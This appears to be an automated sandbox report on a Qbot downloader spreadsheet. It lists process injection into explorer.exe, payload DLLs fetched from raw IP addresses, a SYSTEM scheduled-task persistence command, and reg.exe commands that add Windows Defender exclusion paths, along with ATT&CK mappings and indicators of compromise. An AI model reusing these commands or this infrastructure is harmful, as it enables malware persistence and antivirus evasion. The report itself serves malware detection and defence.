Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 772	Thread sleep count: 48 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3024	Thread sleep time: -104000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 292	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 788	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1580	Thread sleep count: 76 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1580	Thread sleep time: -100000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[1].dat			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[2].dat			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

5_2_1000D01F

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,	5_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 6_2_0008AEB4 FindFirstFileW,FindNextFileW,	6_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_1000AEB4 FindFirstFileW,FindNextFileW,	9_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0008AEB4 FindFirstFileW,FindNextFileW,	11_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,	13_2_1000AEB4

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,

5_2_10005F82

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1000DFAD LoadLibraryA,GetProcAddress,

5_2_1000DFAD

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_02114495 or ebx, dword ptr fs:[00000030h]		9_2_02114495
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_00494495 or ebx, dword ptr fs:[00000030h]		13_2_00494495

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 6_2_00085A61 RtlAddVectoredExceptionHandler,

6_2_00085A61

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: EE102D	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: EE102D	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: EE102D	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1172 base: B0000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1172 base: EE102D value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 236 base: B0000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 236 base: EE102D value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1308 base: B0000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 1308 base: EE102D value: E9	Jump to behavior

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: #Qbot downloader.xls, type: SAMPLE

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn vevmwwj /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 21:23 /ET 21:35	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Krngnamoimcp' /d '0'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Waizacawzvcu' /d '0'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior

Source: explorer.exe, 00000006.00000002.820310500.0000000001190000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.820310500.0000000001190000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000002.820310500.0000000001190000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 6_2_000831C2 CreateNamedPipeA,

6_2_000831C2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

5_2_1000980C

Source: C:\Windows\SysWOW64\regsvr32.exe

5_2_1000D01F

Stealing of Sensitive Information:

Yara detected Qbot

Show sources

Source: Yara match	File source: 9.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.440000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.819617621.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.559785788.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.551759186.0000000000190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.543038317.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Qbot

Show sources

Source: Yara match	File source: 9.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.440000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.819617621.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.559785788.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.551759186.0000000000190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.555668005.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.543038317.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter11	Windows Service3	Windows Service3	Masquerading121	Credential API Hooking1	System Time Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection413	Disable or Modify Tools1	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting2	Logon Script (Windows)	Scheduled Task/Job1	Modify Registry1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Native API1	Network Logon Script	Network Logon Script	Process Injection413	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Exploitation for Client Execution32	Rc.common	Rc.common	Scripting2	Cached Domain Credentials	System Information Discovery15	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
#Qbot downloader.xls	9%	ReversingLabs	Script.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[2].dat	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[1].dat	100%	Joe Sandbox ML
C:\Users\user\Drezd.red	9%	ReversingLabs
C:\Users\user\Drezd1.red	9%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.%s.comPA	0%	URL Reputation	safe
http://185.183.96.67/44466.8890891204.dat	0%	Avira URL Cloud	safe
http://190.14.37.178/44466.8890891204.dat	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.183.96.67/44466.8890891204.dat	false	Avira URL Cloud: safe	unknown
http://190.14.37.178/44466.8890891204.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	regsvr32.exe, 00000005.00000002.543565001.00000000021A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.819876628.0000000000960000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.552496704.00000000022B0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000002.555876027.0000000000A00000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000005.00000002.543565001.00000000021A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.819876628.0000000000960000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.552496704.00000000022B0000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000002.555876027.0000000000A00000.00000002.00020000.sdmp	false		high
http://servername/isapibackend.dll	regsvr32.exe, 00000004.00000002.546532778.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.543183246.0000000001EA0000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.555836573.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.552039432.0000000001E10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.562885480.0000000000940000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.560052326.0000000000920000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.183.96.67	unknown	Netherlands	60117	HSAE	false
190.14.37.178	unknown	Panama	52469	OffshoreRacksSAPA	false
185.250.148.213	unknown	Russian Federation	48430	FIRSTDC-ASRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491755
Start date:	27.09.2021
Start time:	21:18:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	#Qbot downloader (renamed file extension from none to xls)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@29/9@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 23.8% (good quality ratio 22.2%) Quality average: 75.4% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 85% Number of executed functions: 129 Number of non-executed functions: 103
Cookbook Comments:	Adjust boot time Enable AMSI Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtSetInformationFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/491755/sample/#Qbot downloader.xls

Simulations

Behavior and APIs

Time	Type	Description
21:21:20	API Interceptor	46x Sleep call for process: regsvr32.exe modified
21:21:22	API Interceptor	882x Sleep call for process: explorer.exe modified
21:21:25	API Interceptor	2x Sleep call for process: schtasks.exe modified
21:21:26	Task Scheduler	Run new task: vevmwwj path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.183.96.67	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	185.183.96.67/44466.7516903935.dat
185.183.96.67	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	185.183.96.67/44466.7022844907.dat
190.14.37.178	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	190.14.37.178/44466.7516903935.dat
190.14.37.178	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	190.14.37.178/44466.7022844907.dat
185.250.148.213	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	185.250.148.213/44466.7516903935.dat
185.250.148.213	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	185.250.148.213/44466.7022844907.dat

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HSAE	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	KHI13mrm4c.exe	Get hash	malicious	Browse	185.183.98.2
	Copy of Payment-228607772-09222021.xls	Get hash	malicious	Browse	185.82.202.248
	NJS4hNBeUR.exe	Get hash	malicious	Browse	185.198.57.68
	rQoEGMGufv.exe	Get hash	malicious	Browse	185.45.192.203
	5ya8R7LxXl.exe	Get hash	malicious	Browse	185.45.192.203
	Uz2eSldsZe.exe	Get hash	malicious	Browse	185.45.192.203
	SWIFT_COPY.htm	Get hash	malicious	Browse	194.36.191.196
	3hTS09wZ7G.exe	Get hash	malicious	Browse	185.183.96.3
	040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exe	Get hash	malicious	Browse	185.183.96.3
	OC2Z0JbqfA.exe	Get hash	malicious	Browse	185.183.96.3
	89o9iHBGiB.exe	Get hash	malicious	Browse	185.183.96.3
	DWVByMCYL8.exe	Get hash	malicious	Browse	185.183.96.3
	DUpgpAnHkq.exe	Get hash	malicious	Browse	185.183.96.3
	7EAz8cQ49v.exe	Get hash	malicious	Browse	185.183.96.3
	f9aoawyl4M.exe	Get hash	malicious	Browse	185.183.96.3
	7da1ac7cd7a61715807d49e8c79b054ba302b3988ba19.exe	Get hash	malicious	Browse	185.183.96.3
	38fd2cb3083f33b50606b7821453769103bde24335734.exe	Get hash	malicious	Browse	185.183.96.3
	JSYInjvdnM.exe	Get hash	malicious	Browse	185.183.96.3
OffshoreRacksSAPA	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	190.14.37.178
	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	190.14.37.178
	Claim-838392655-09242021.xls	Get hash	malicious	Browse	190.14.37.173
	claim.xls	Get hash	malicious	Browse	190.14.37.173
	Claim-1368769328-09242021.xls	Get hash	malicious	Browse	190.14.37.173
	Claim-1763045001-09242021.xls	Get hash	malicious	Browse	190.14.37.173
	Claim-680517779-09242021.xls	Get hash	malicious	Browse	190.14.37.173
	Payment-687700136-09212021.xls	Get hash	malicious	Browse	190.14.37.232
	Permission-851469163-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-851469163-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-830724601-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-830724601-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-40776837-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-40776837-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\Drezd1.red	Compensation-2308017-09272021.xls	Get hash	malicious	Browse
C:\Users\user\Drezd1.red	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse
C:\Users\user\Drezd.red	Compensation-2308017-09272021.xls	Get hash	malicious	Browse
C:\Users\user\Drezd.red	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[1].dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	387072
Entropy (8bit):	4.528526750288275
Encrypted:	false
SSDEEP:	3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2Mz:vs6Xpq0H3Jhds/9+qC/zfTPL9
MD5:	797AE4AC5491942A9D84811499580F49
SHA1:	AD90C5CB1343C76FD8D3EA5768D59E2DDFE8141E
SHA-256:	6A8A283DAEF75106464755B91467B81AD9320BBAE30F167F232BF05891CCF60C
SHA-512:	6EE2235E11D8AEA1BDB3ECF2CEF31265385030CA36B04A454CB589FB8712F9FF91FD22635A18122B8CCA756D9144B1D5A2171ED20A789408F46E2D96B386106F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......\|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.8890891204[2].dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	387072
Entropy (8bit):	4.528526750288275
Encrypted:	false
SSDEEP:	3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2Mz:vs6Xpq0H3Jhds/9+qC/zfTPL9
MD5:	797AE4AC5491942A9D84811499580F49
SHA1:	AD90C5CB1343C76FD8D3EA5768D59E2DDFE8141E
SHA-256:	6A8A283DAEF75106464755B91467B81AD9320BBAE30F167F232BF05891CCF60C
SHA-512:	6EE2235E11D8AEA1BDB3ECF2CEF31265385030CA36B04A454CB589FB8712F9FF91FD22635A18122B8CCA756D9144B1D5A2171ED20A789408F46E2D96B386106F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......\|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	162688
Entropy (8bit):	4.254461970813892
Encrypted:	false
SSDEEP:	1536:C6zL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CSJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:	163694AA52A16C8F6CDCEE785FA7D6C5
